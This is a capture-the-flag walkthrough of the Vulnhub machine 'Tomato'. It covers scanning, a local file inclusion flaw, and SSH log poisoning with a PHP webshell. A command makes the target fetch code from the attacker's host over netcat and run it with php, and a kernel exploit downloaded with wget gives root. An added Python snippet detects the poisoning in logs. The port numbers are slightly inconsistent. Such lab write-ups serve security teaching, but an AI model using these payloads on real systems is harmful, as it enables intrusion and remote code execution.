Tomato Vulnhub Walkthrough

In this article we walk through another Vulnhub machine, Tomato. The VM was created by the sunCSR Team, and its difficulty is Medium to Hard. It is hosted on Vulnhub, where you can download it.

Network Scanning

To begin, we find the IP address of the target machine with the following command.

nmap -sn 192.168.43.1/24

We found the target's IP address, 192.168.43.144. The next step is to scan the target machine's ports with Nmap.

nmap -sV 192.168.43.144 -p-

The scan showed ports 21/FTP, 80/HTTP, 2211/SSH, and 8888/HTTP (running the Nginx HTTP server). Let's move on to the enumeration step.

Enumeration

We started with port 80/HTTP and opened the target machine's web page in our browser by navigating to its IP address.

http://192.168.43.144

For further enumeration, we ran gobuster to brute-force the web directories and enumerate all files and directories.

gobuster dir --url http://192.168.43.144 -w /usr/share/wordlists/dirb/common.txt

We discovered a useful directory, antibot_image. Navigating to it shows many files and directories. Let's open info.php.

http://192.168.43.144/antibot_image/antibots/info.php

Reading the page source, we found a comment. It suggests that the page is likely vulnerable to LFI (Local File Inclusion). So, without wasting time, we try to access /etc/passwd.

http://192.168.43.144/antibot_image/antibots/info.php?image=../../../../../etc/passwd

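Here we try Apache log poisoning through SSH, creating a backdoor that passes a GET parameter to system(). The PHP snippet is given as the SSH user name, so the failed login attempt writes it to /var/log/auth.log, the file we later include through the LFI.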

ssh '<?php system($_GET['shell']); ?>'@192.168.43.144 -p2211

After running the log poisoning command, we create a PHP reverse shell and transfer it to the target machine using netcat. Let's run the commands. Remember to start your netcat listener first.

vi rshell.php
sudo nc -lvp 40 < rshell.php
sudo nc -lvp 555

Now we make the target machine download our payload. We append an extra command, |php, so that the shell is executed automatically once it has been transferred.

http://192.168.43.144/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=nc 192.168.43.103 40 |php
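
From the defender's side, both steps above leave traces: the PHP snippet is stored in auth.log as an SSH user name, and the LFI requests carry ../ sequences in the image parameter. The following Python check is an added example, not part of the original walkthrough; the log lines are constructed samples and the function names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# sshd writes the attempted user name verbatim into auth.log.
SSHD_USER = re.compile(r"sshd\[\d+\]: .*?[Ii]nvalid user (?P<user>.*) from (?P<ip>\d+(?:\.\d+){3})")
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+)')

def poisoned_ssh_users(auth_lines):
    """(source_ip, user_name) for sshd entries whose user name carries a PHP open tag."""
    found = (SSHD_USER.search(line) for line in auth_lines)
    return [(m["ip"], m["user"]) for m in found if m and "<?" in m["user"]]

def traversal_requests(access_lines):
    """(source_ip, parameter, resolved_path) for query values containing ../ sequences."""
    hits = []
    for line in access_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        for name, value in parse_qsl(urlsplit(m["target"]).query):
            if "../" in value:
                # Worst case: assume the traversal reaches the filesystem root.
                hits.append((m["ip"], name, posixpath.normpath("/" + value)))
    return hits

def poisoning_chain(auth_lines, access_lines):
    """Source IPs that planted PHP in auth.log and then requested a file under /var/log."""
    planters = {ip for ip, _ in poisoned_ssh_users(auth_lines)}
    readers = {ip for ip, _, path in traversal_requests(access_lines)
               if path.startswith("/var/log/")}
    return sorted(planters & readers)

# Constructed sample lines (host name, PIDs, sizes and timestamps are made up).
AUTH_LOG = [
    "Sep  7 10:11:58 ubuntu sshd[1201]: Failed password for invalid user admin from 192.168.43.103 port 50122 ssh2",
    "Sep  7 10:12:01 ubuntu sshd[1207]: Invalid user <?php system($_GET['shell']); ?> from 192.168.43.103",
]
ACCESS_LOG = [
    '192.168.43.103 - - [07/Sep/2020:10:12:30 +0000] "GET /antibot_image/antibots/info.php HTTP/1.1" 200 512',
    '192.168.43.103 - - [07/Sep/2020:10:12:44 +0000] "GET /antibot_image/antibots/info.php?image=../../../../../etc/passwd HTTP/1.1" 200 1804',
    '192.168.43.103 - - [07/Sep/2020:10:13:02 +0000] "GET /antibot_image/antibots/info.php?image=../../../../../var/log/auth.log HTTP/1.1" 200 9021',
]

if __name__ == "__main__":
    print(poisoned_ssh_users(AUTH_LOG))
    print(traversal_requests(ACCESS_LOG))
    print(poisoning_chain(AUTH_LOG, ACCESS_LOG))
```

An IP returned by poisoning_chain both wrote PHP into the authentication log and read a file under /var/log through a request parameter, which is the sequence this section describes.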

Privilege Escalation

We now have a reverse connection from the target machine. The next step is to escalate privileges on it. Let's check the target machine's kernel version with the following command.

uname -r

We searched for an exploit for 4.4.0-21-generic and found a local root privilege escalation exploit on exploit-db. The target system has no GCC compiler, so we open another terminal on our local machine and compile the exploit there.

After compiling the exploit, we started a local Python server on port 80, downloaded the exploit to the target machine's /tmp directory, added execute permission, and ran it.

wget http://192.168.43.103:88/get_root
chmod +x get_root
./get_root

After executing the exploit we get a blank root shell. Let's move to the root directory and read our final flag, proof.txt.

id
cd /root
ls
cat proof.txt

By Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.